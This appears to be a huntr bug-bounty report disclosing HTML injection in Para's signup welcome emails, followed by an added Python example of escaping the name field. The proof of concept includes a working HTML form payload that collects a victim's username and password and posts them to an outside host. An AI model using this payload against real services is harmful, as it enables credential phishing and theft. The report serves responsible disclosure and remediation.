huntr | Gaurav-g2 | 7555693F-94E4-4183-98CB-3497DA6DF028
May 14, 2022 - 12:55 p.m.

HTML injection leads to cross-site scripting

www.huntr.dev

EPSS: 0.001 (Low), percentile 30.2%

Description

Hi, I found a way to inject HTML into a user's email. In this case, if an attacker sets the victim's name to an HTML form, it will be rendered by your system and the rendered HTML will then be sent to the victim.

Proof of Concept

  1. Go to https://paraio.com/signup/ and add this payload in the name field:

```html
<form action="https://brutelogic.com.br/poc.svg/" method="post">
  <label for="username">Username:</label>
  <input class="userbox" type="text" name="username"/><br />
  <label for="password">Password:</label>
  <input type="text" name="password" >
  <input class="button" type="submit" value="submit" />
</form>
```

  2. Enter the victim's email and create a new account.

  3. Now go to the mail and check; you will see our code has been rendered as HTML.

  4. Submit the form and XSS.

```
// PoC.js
var payload = …
```
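The fix for the behaviour reported above is to encode the signup name for the HTML context before it reaches the mail body. The following is an added example, not Para's code or the reporter's; the template, the function names and the sample name are assumptions made for illustration.

```python
import html
from email.message import EmailMessage

# Hypothetical welcome-mail template; the project's real template is not shown on the page.
TEMPLATE = "<p>Hello {name},</p><p>Please confirm your account.</p>"


def render_unsafe(name: str) -> str:
    """Behaviour the report describes: the name reaches the HTML body as markup."""
    return TEMPLATE.format(name=name)


def render_safe(name: str) -> str:
    """Encode <, >, &, double and single quotes so the name is displayed as text."""
    return TEMPLATE.format(name=html.escape(name, quote=True))


def build_welcome_mail(name: str, to_addr: str) -> EmailMessage:
    """Build a multipart mail: raw name in text/plain, escaped name in text/html."""
    msg = EmailMessage()
    msg["To"] = to_addr
    msg["Subject"] = "Confirm your account"
    # The plain-text part is never parsed as HTML, so the name needs no encoding there.
    msg.set_content(f"Hello {name},\n\nPlease confirm your account.")
    # The HTML part only ever receives the encoded name.
    msg.add_alternative(render_safe(name), subtype="html")
    return msg


# Constructed sample input modelled on the form in the report (not a real endpoint).
SAMPLE_NAME = '<form action="https://example.invalid/"><input name="password"></form>'

if __name__ == "__main__":
    print("unsafe:", render_unsafe(SAMPLE_NAME))
    print("safe:  ", render_safe(SAMPLE_NAME))
    mail = build_welcome_mail(SAMPLE_NAME, "user@example.com")
    print(mail.get_body(preferencelist=("html",)).get_content())
```

Escaping at render time keeps the stored name unchanged, so the same value can be encoded differently for other output contexts.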

